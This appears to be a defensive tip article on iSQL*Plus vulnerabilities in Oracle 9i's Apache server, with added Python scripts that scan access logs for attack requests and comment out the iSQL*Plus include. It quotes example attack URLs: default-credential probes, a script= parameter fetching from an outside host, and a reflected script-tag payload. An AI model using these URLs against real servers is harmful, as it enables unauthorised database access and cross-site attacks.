
Oracle Tip: Beware of iSQL*Plus vulnerabilities

Many security agencies recently reported several vulnerabilities with the Apache HTTP server that comes with Oracle 9i. Depending on your environment, you may want to disable iSQL*Plus to prevent exploits against this vulnerability.

This article originally appeared in the Oracle e-newsletter.

iSQL*Plus is a small HTML Web interface front-end that uses SQL*Plus as the backend. It was intended as a way of easily generating HTML reports through a Web service using existing SQL*Plus scripts. By default, iSQL*Plus is installed (and enabled) along with the Apache HTTP server that comes with Oracle 9i.

Many security agencies recently reported several vulnerabilities with this server. Depending on your environment, you may want to disable iSQL*Plus to prevent exploits against these vulnerabilities.

First, check to see if iSQL*Plus is running. Try entering the URL http://<hostname>:<port>/isqlplus ..., where <hostname> is the name or IP address of the host with Oracle 9i HTTP server installed and <port> is the port number the server is listening on, which is 80 by default. For example, on my Windows machine with a fresh Oracle 9i installation, I would enter http://127.0.0.1/isqlplus. If you get a page with login fields, then you have iSQL*Plus installed and running. You should consider the vulnerability issues before allowing it to run on your machine.

The first vulnerability is the buffer overflow problem. If hackers can access the main page, they can send a very long input to username and password and overflow into the stack and return address. A knowledgeable hacker can run arbitrary code within the security context of the Apache server, such as "SYSTEM" under Windows or "oracle" under UNIX. Oracle already addressed this issue by providing a downloadable patch (with issue number 2581911) at OracleMetaLink. The patch for this problem doesn't seem to be available in any default versions so far.

A second vulnerability is the fact that this screen exists at all. It's an opportunity for someone with access to your Web site to test which username/password combinations are valid on your database. For instance, I could test http://127.0.0.1/isqlplus?userid=scott/tiger and http://127.0.0.1/isqlplus?userid=system/manager. If I get in using a database account, I can access any table in the database, provided I know the name.

A third vulnerability is the fact that iSQL*Plus can open a script via the URL, which opens the door to cross-site attacks. For example, if I get a user to click on the link http://127.0.0.1/isqlplus?userid=scott/tiger&script=http://192.168.168.244/foo.pl, my Web server, which contains the Perl script foo.pl, can pass back a valid SQL script to run against your database. But I could also receive all the HTTP header information from your server's Web site requesting the document.

Another vulnerability in iSQL*Plus is due to the fact that iSQL*Plus runs JavaScript in the page, so a crafted parameter value can inject arbitrary JavaScript code into it. For an example from the official alert, try typing the URL http://127.0.0.1/isqlplus?action=<script>alert('This%20could%20have%20been%20a%20hacker')</script> into a JavaScript-enabled browser. You should see an error in the page and a pop-up alert box.
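If you keep iSQL*Plus running while you evaluate the patch, you can at least watch for the request patterns described above in the Oracle HTTP server's access log. The following Python script is an added example, not code from the original article or from Oracle: it parses Common Log Format lines, keeps only requests to the iSQL*Plus path, and flags credentials passed in the URL, a script= parameter that fetches from an untrusted host, and a <script> tag in the query string. The log lines are constructed samples, and the /isqlplus path, log format and field names are assumptions; the stack overflow in the username and password fields is sent in a POST body, which a standard access log does not record, so it is not covered here.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample Apache access-log lines (Common Log Format); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Nov/2002:10:01:02 +0000] "GET /isqlplus HTTP/1.1" 200 1532
10.0.0.5 - - [12/Nov/2002:10:01:09 +0000] "GET /isqlplus?userid=scott/tiger HTTP/1.1" 200 2210
10.0.0.5 - - [12/Nov/2002:10:01:15 +0000] "GET /isqlplus?userid=system/manager HTTP/1.1" 200 2210
10.0.0.9 - - [12/Nov/2002:10:02:00 +0000] "GET /isqlplus?userid=scott/tiger&script=http://192.168.168.244/foo.pl HTTP/1.1" 200 3100
10.0.0.9 - - [12/Nov/2002:10:02:30 +0000] "GET /isqlplus?action=%3Cscript%3Ealert('x')%3C/script%3E HTTP/1.1" 500 801
10.0.0.7 - - [12/Nov/2002:10:03:00 +0000] "GET /index.html HTTP/1.1" 200 4400
"""

# Common Log Format: client, identd, user, [timestamp], "METHOD target PROTO", status, size
CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Default iSQL*Plus mapping; change this if isqlplus.conf maps a different path (assumption).
ISQLPLUS_PATH = "/isqlplus"


def classify(line, trusted_script_hosts=()):
    """Return a record for an iSQL*Plus request, or None for other lines."""
    m = CLF_RE.match(line)
    if not m:
        return None
    target = m.group("target")
    parts = urlsplit(target)
    if not parts.path.lower().startswith(ISQLPLUS_PATH):
        return None
    query = parse_qs(parts.query, keep_blank_values=True)
    findings = []
    if "userid" in query:
        # Database credentials in the URL end up in access logs, proxies and browser history.
        findings.append("credentials-in-url")
    for url in query.get("script", []):
        # The script= parameter makes the server fetch and run a script from that URL.
        host = urlsplit(url).hostname
        if url.lower().startswith(("http://", "https://")) and host and host not in trusted_script_hosts:
            findings.append("remote-script:" + host)
    # Decode percent-encoding so %3Cscript%3E is caught as well as a literal tag.
    if "<script" in unquote(parts.query).lower():
        findings.append("script-tag-in-query")
    return {"ip": m.group("ip"), "time": m.group("ts"), "target": target,
            "status": m.group("status"), "findings": findings}


def scan(log_text, trusted_script_hosts=()):
    """All iSQL*Plus requests in the log, each with its list of findings."""
    records = []
    for line in log_text.splitlines():
        rec = classify(line, trusted_script_hosts)
        if rec is not None:
            records.append(rec)
    return records


def credential_probe_ips(records, threshold=2):
    """Clients that tried at least `threshold` username/password pairs via the URL."""
    counts = {}
    for rec in records:
        if "credentials-in-url" in rec["findings"]:
            counts[rec["ip"]] = counts.get(rec["ip"], 0) + 1
    return sorted(ip for ip, n in counts.items() if n >= threshold)


if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for rec in hits:
        if rec["findings"]:
            print(rec["ip"], rec["time"], rec["target"], ", ".join(rec["findings"]))
    print("credential probing from:", credential_probe_ips(hits))
```

Point the script at your real access log with `scan(open(path).read())`; if you legitimately serve SQL scripts from an internal host, pass it in `trusted_script_hosts` so only unexpected hosts are reported. A plain request to /isqlplus with no parameters is still returned (with an empty findings list) so that you can see who is reaching the login page at all.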

Unless you have a specific need for iSQL*Plus, and your Web site running Oracle's Apache server is completely secure, I recommend that you disable iSQL*Plus and use the command line or Windows version of SQL*Plus. To disable iSQL*Plus, you can simply comment out the following line from the oracle_apache.conf file that should reside in ?/Apache/Apache/conf (where ? stands for your Oracle Home):

include "<oracle home>/sqlplus/admin/isqlplus.conf"

You should replace the <oracle home> in this code with your actual Oracle Home directory. If you really need to use iSQL*Plus, you should at least consider changing the default URL path. If you try to search for "isqlplus" on a search engine, you may see a couple of people who had their /isqlplus directory listed. You can change the directory that is mapped to iSQL*Plus in the isqlplus.conf file listed above.
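The edit above is a one-line change, but on a server you administer it is worth making it repeatable and reversible. The following Python helper is an added example, not code from the article or from Oracle: it comments out every active include of isqlplus.conf in oracle_apache.conf, leaves everything else untouched, is safe to run twice, and writes a .bak copy before changing the file. The sample configuration text and the /u01/app/oracle/product/9.2.0 Oracle Home are constructed; the real file lives under the Apache conf directory named above.

```python
import re
import shutil
from pathlib import Path

# Constructed sample of an oracle_apache.conf; the paths are placeholders, not a real install.
SAMPLE_CONF = """\
# oracle_apache.conf (constructed sample)
include "/u01/app/oracle/product/9.2.0/Apache/modplsql/cfg/plsql.conf"
include "/u01/app/oracle/product/9.2.0/sqlplus/admin/isqlplus.conf"
"""

# An uncommented Apache "include" of isqlplus.conf, any case, with or without quotes.
# Lines that already start with '#' do not match, which makes the edit idempotent.
INCLUDE_RE = re.compile(r'^\s*include\s+"?[^"\s]*isqlplus\.conf"?\s*$', re.IGNORECASE)


def disable_isqlplus(conf_text):
    """Comment out active isqlplus.conf includes; return (new_text, lines_changed)."""
    out = []
    changed = 0
    for line in conf_text.splitlines(keepends=True):
        if INCLUDE_RE.match(line):
            out.append("# " + line)
            changed += 1
        else:
            out.append(line)
    return "".join(out), changed


def isqlplus_enabled(conf_text):
    """True if any active (uncommented) include of isqlplus.conf remains."""
    return any(INCLUDE_RE.match(line) for line in conf_text.splitlines())


def disable_isqlplus_file(conf_path):
    """Apply the change to a file on disk, keeping a .bak copy; return lines changed."""
    path = Path(conf_path)
    text = path.read_text()
    new_text, changed = disable_isqlplus(text)
    if changed:
        shutil.copy2(path, path.with_suffix(path.suffix + ".bak"))
        path.write_text(new_text)
    return changed


if __name__ == "__main__":
    new_conf, n = disable_isqlplus(SAMPLE_CONF)
    print(f"commented out {n} include line(s); still enabled: {isqlplus_enabled(new_conf)}")
    print(new_conf)
```

Run `disable_isqlplus_file("<oracle home>/Apache/Apache/conf/oracle_apache.conf")` with your real path, then restart the Oracle HTTP server so the change takes effect, and confirm with the browser check from the start of the article that /isqlplus no longer returns a login page. `isqlplus_enabled()` can be reused as a periodic audit check to catch the line being restored by a later reinstall or patch.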

Scott Stephens worked for Oracle for more than 13 years in technical support, e-commerce, marketing, and software development. For more of his Oracle tips, visit our Oracle Dev Tips Library.
